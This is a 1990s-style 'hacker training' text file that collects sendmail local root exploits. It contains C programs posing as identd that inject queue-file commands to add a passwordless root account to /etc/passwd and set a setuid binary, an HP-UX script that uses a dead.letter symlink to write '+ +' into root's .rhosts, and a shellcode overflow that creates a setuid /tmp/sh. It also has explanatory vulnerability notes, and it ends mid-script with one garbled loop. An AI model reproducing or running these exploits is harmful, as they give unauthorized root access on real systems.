sendmail2.txt

黑客培训教程

 * gcc ident.c -o ident

 * add the following line to your /etc/inetd.conf:

 * ident  stream tcp  nowait  root  /tmp/ident  in.identd

 * then kill -HUP inetd

 *

 * Not for not public use or disclosure.

 *

 * This is a sendmail 8.6.10 attack based on the problems that

 * sendmail 8.6.10 inherited from sendmail 8.6.9 - blindly accepting

 * information given to it by identd, which included bogus characters

 * and newlines that it later appended to the queue file.  Sendmail 8.6.10

 * supposedly "strips" newlines before they are written, however, it

 * converts them to spaces, and the following code demonstrates that

 * quick work-around patches are never ever stable...

 *

 * NOTES:  This hack only works when sendmail queues up the message for

 * later delivery.  This depends on the configuration of sendmail.cf and

 * on the machine loading.  If you can do something to drag the machine to

 * its knees, then fire off this attack, you stand a much better chance of

 * success.

 *

 * NOTES: If sendmail.cf is configured with Og1 and Ou1 lines (setting the

 * default user to bin.bin), this exploit will not work.

 *

 * Also, since this only works when sendmail queues up the message for

 * later delivery, the time of execution is dependant on how sendmail

 * has been configured in sendmail.cf and machine load.  Heavily loaded

 * machines (or machines that have been intentionally flooded) have a

 * greater possibility of this exploit working.

 *

 */

#include <sys/types.h>

#include <sys/fcntl.h>

#include <sys/time.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

/* TIMEOUT is the number of seconds to wait before closing the connection if

 * the client doesn't provide the port pairs.

 */

#define TIMEOUT 120

/* PROCINFO_BUFFER_SIZE must be bigger than 80 */

#define OUTPUT_BUFFER_SIZE 2048

#define SOCKET_BUFFER_SIZE 100

unsigned short lport = 0, rport = 0;

void

main ()

{

    unsigned long here, there;

    struct fd_set fdset;

    struct timeval timeout;

    char buffer[OUTPUT_BUFFER_SIZE];

    char inbuffer[SOCKET_BUFFER_SIZE];

    int len;

    int fd;

    FD_ZERO (&fdset);

    FD_SET (0, &fdset);

    timeout.tv_sec = TIMEOUT;

    timeout.tv_usec = 0;

    select (1, &fdset, NULL, NULL, &timeout);

    len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );

    if (len <= 0)

    exit (0);

    FD_SET (0, &fdset);

    sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,

    "Croot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal,

    P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nR<\"|/bin/echo toor::0:1:toor:/:/bin/csh

 >> /etc/passwd\">\r\nR<\"|/usr/bin/chmod 4755 /usr/bin/time\");

    write (1, buffer, strlen (buffer));

    exit (0);

}

................................ CuT HeRe ..................................

Second Exploit follows:

/* 8.6.10 sendmail attacker

 *

 * gcc ident.c -o ident

 * add the following line to your /etc/inetd.conf:

 * ident  stream tcp  nowait  root  /tmp/ident  in.identd

 * then kill -HUP inetd

 *

 * Not for not public use or disclosure.

 *

 * This is a sendmail 8.6.10 attack based on the problems that

 * sendmail 8.6.10 inherited from sendmail 8.6.9 - blindly accepting

 * information given to it by identd, which included bogus characters

 * and newlines that it later appended to the queue file.  Sendmail 8.6.10

 * supposedly "strips" newlines before they are written, however, it

 * converts them to spaces, and the following code demonstrates that

 * quick work-around patches are never ever stable...

 *

 * NOTES: If sendmail.cf is configured with Og1 and Ou1 lines (setting the

 * default user to bin.bin), this exploit will not work.

 *

 * Also, since this only works when sendmail queues up the message for

 * lar delivery, the time of execution is dependant on how sendmail

 * has been configured in sendmail.cf and machine load.  Heavily loaded

 * machines (or machines that have been intentionally flooded) have a

 * greater possibility of this exploit working.

 *

 */

#include <sys/types.h>

#include <sys/fcntl.h>

#include <sys/time.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

/* TIMEOUT is the number of seconds to wait before closing the connection if

 * the client doesn't provide the port pairs.

 */

#define TIMEOUT 120

/* PROCINFO_BUFFER_SIZE must be bigger than 80 */

#define OUTPUT_BUFFER_SIZE 2048

#define SOCKET_BUFFER_SIZE 100

unsigned short lport = 0, rport = 0;

void

main ()

{

    unsigned long here, there;

    struct fd_set fdset;

    struct timeval timeout;

    char buffer[OUTPUT_BUFFER_SIZE];

    char inbuffer[SOCKET_BUFFER_SIZE];

    int len;

    int fd;

    FD_ZERO (&fdset);

    FD_SET (0, &fdset);

    timeout.tv_sec = TIMEOUT;

    timeout.tv_usec = 0;

    select (1, &fdset, NULL, NULL, &timeout);

    len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );

    if (len <= 0)

    exit (0);

    FD_SET (0, &fdset);

    sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,

    "Croot\t\t\t\t\t\t\tMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\t

    Mlocal,

    P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\tR<\"|/bin/echo toor::0:1:toor:/:

/bin/csh >> /etc/passwd\">\t\t\tR<\"|/usr/bin/chmod 4755 /usr/bin/time\">\r\n

    $rascii done");

    write (1, buffer, strlen (buffer));

    exit (0);

}



................................ CuT HeRe ..................................

HP-UX = HP-UX 9.x =

#!/bin/sh

# This works on virgin HPUX 9.x sendmail.cf

# The link can be set to any file on the system, it will append the contents

# of the email to the linked file (/etc/passwd, /etc/hosts.equiv, /.rhosts)..

# - sirsyko

r00tDIR=`grep root /etc/passwd |cut -f6 -d:`

RunDMC=`hostname`

if [ -f /tmp/dead.letter ]; then rm /tmp/dead.letter

fi

if [ -f /tmp/dead.letter ]; then

 echo "Sorry, aint gonna work"

 exit

fi

ln -s  ${r00tDIR}/.rhosts /tmp/dead.letter

(

sleep 1

echo "helo"

echo "mail from: noone"

echo "rcpt to: noone@bounce"

echo "data"

echo "+ +"

echo "."

sleep 3

echo "quit"

) | telnet ${RunDMC} 25

sleep 5

remsh ${RunDMC} -l root

............... CuT HeRe ...............

What the r00t guys exploit does is just this:

   * creates a symbolic link to the target file (in this case '.rhosts' in
     root's directory) called '/tmp/dead.letter'.
   * Then sends a message (containing lines you want to append) to a
     non-existent user.
   * Sendmail is configured (as default) to append lines of non-recipient
     messages to '/tmp/dead.letter' and does it with root privileges. If
     '/tmp/dead.letter' is a symbolic link Sendmail will follow it and will
     overwrite the pre-existent file.
   * Probably if Sendmail configuration has been changed to make it behave
     in a different way, looking at the cf file could lead you to exploit
     the bug the same.

8.7.5 gecos = 8.X.X <8.8.0 = TeSTed oN 8.6.12

This bug was pointed out by Mudge of L0pht on Bugtraq on Sept 1996,
excerpts follow:

A buffer overflow condition exists that allows a user to overwrite the
information in a saved stack frame. When the function returns, the saved
frame is popped off of the stack and user code can be executed. If a user
is able to alter his/her gecos field then that user can exploit a coding
flaw in sendmail to elevate their effective UID to 0.

The actual problem in the code is quite apparent.

     Inside recipient.c we find the following:

       char nbuf[MAXNAME + 1];

       ...

       buildfname(pw->pw_gecos, pw->pw_name, nbuf);

The problem is that nbuf[MAXNAME + 1] is a fixed length buffer and as we
will soon see, buildfname() does not honor this. [ ..... ]

This particular problem has been fixed in Sendmail 8.8 beta.

Here we have an example of exploit:

------------------------------ Cut Here ------------------------------------

/*                               Hi !                                       */

/* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */

/* If you have any problems with it, send letter to me.                     */

/*                             Have fun !                                   */

/* -----------------   Dedicated to my beautiful lady   ------------------  */

/* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su                 */

#include <stdio.h>

main()

{

void make_files();

     make_files();

     system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;e

cho See result in /tmp");

}

void make_files()

 {

  int i,j;

  FILE *f;

  char nop_string[200];

  char code_string[]=

                      {

                         "\xeb\x50"                         /* jmp

cont */

/* geteip: */            "\x5d"                             /* popl

%ebp */

                         "\x55"                             /* pushl

%ebp */

                         "\xff\x8d\xc3\xff\xff\xff"         /* decl

0xffffffc3(%ebp) */

                         "\xff\x8d\xd7\xff\xff\xff"         /* decl

0xffffffd7(%ebp) */

                         "\xc3"                             /* ret */

/* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"

/* 0xffffffc3(%ebp): */ "\x3c"

                        "chmod a=rsx /tmp/sh"

/* 0xffffffd7(%ebp): */ "\x01"

                        "-leshka-leshka-leshka-leshka-"    /* reserved */

/* cont:  */            "\xc7\xc4\x70\xcf\xbf\xef"         /* movl

$0xefbfcf70,%esp */

                        "\xe8\xa5\xff\xff\xff"             /* call

geteip */

                        "\x81\xc5\xb4\xff\xff\xff"         /* addl

$0xb4ffffff,%ebp */

                        "\x55"                             /* pushl  %ebp */

                        "\x55"                             /* pushl  %ebp */

                        "\x68\xd0\x77\x04\x08"             /* pushl

$0x80477d0

 */

                        "\xc3"                             /* ret */

                        "-leshka-leshka-leshka-leshka-"    /* reserved */

                        "\xa0\xcf\xbf\xef"

                     };

  j=269-sizeof(code_string);

  for(i=0;i\"$1\"\n");

  fprintf(f,"touch -t 2510711313 \"$1\"\n");

  fclose(f);

}

................................ Cut Here ................................

mime7to8() = 8.8.0 =

An attacker can simply create a very large message in which each line ends
with "=" and use it to overwrite the sendmail process's stack. Here the bug
is only described... why doesn't someone write an exploit?!

There is a serious bug in the mime7to8() function of sendmail 8.8.0 which
allows anyone who can send you mail to execute arbitrary code as root on
your machine. I think mime7to8() only gets invoked if you set the
undocumented "9" mailer flag. However, this flag is set by default in the
cf/mailer/local.m4 file that ships with sendmail 8.8.0. Thus, if you are
using an old V6 format configuration file from sendmail 8.7, you are
probably safe, but if you generated a new V7 configuration file, you are
probably vulnerable to this bug.

Now here are the technical details:

The inner loop of mime7to8() looks like this:

        u_char *obp;

        char buf[MAXLINE];

        u_char obuf[MAXLINE];

        ....

                /* quoted-printable */

                obp = obuf;

                while (fgets(buf, sizeof buf, e->e_dfp) != NULL)

                {

                        if (mime_fromqp((u_char *) buf, &obp, 0, MAXLINE) == 0)

                                continue;

                        putline((char *) obuf, mci);

                        obp = obuf;

                }

When mime_fromqp() encounters a line that ends "=\n", it chops those two
characters off and returns 0 to indicate a continuation line. This causes
the while loop to continue, reading another input line and appending its
contents to obuf. However, when the loop continues without resetting obp to
obuf, there are fewer than MAXLINE characters left in the output buffer.
This means an attacker can simply create a very large message in which each
line ends with "=". Eventually obp will move beyond the end of obuf and
start writing almost arbitrary data to the sendmail process's stack (as
long as no bytes are 0).

smtpd = 8.7-8.8.2 =

Read the exploit and don't bother:

------------------------------ Cut Here --------------------------------

#/bin/sh

#

#

#                                   Hi !

#                This is exploit for sendmail smtpd bug

#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).

#         This shell script does a root shell in /tmp directory.

#          If you have any problems with it, drop me a letter.

#                                Have fun !

#

#

#                           ----------------------

#               ---------------------------------------------

#    -----------------   Dedicated to my beautiful lady   ------------------

#               ---------------------------------------------

#                           ----------------------

#

#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su

#

#

#

echo   'main()                                                '>>leshka.c

echo   '{                                                     '>>leshka.c

echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c

echo   '}                                                     '>>leshka.c

#

#

echo   'main()                                                '>>smtpd.c

echo   '{                                                     '>>smtpd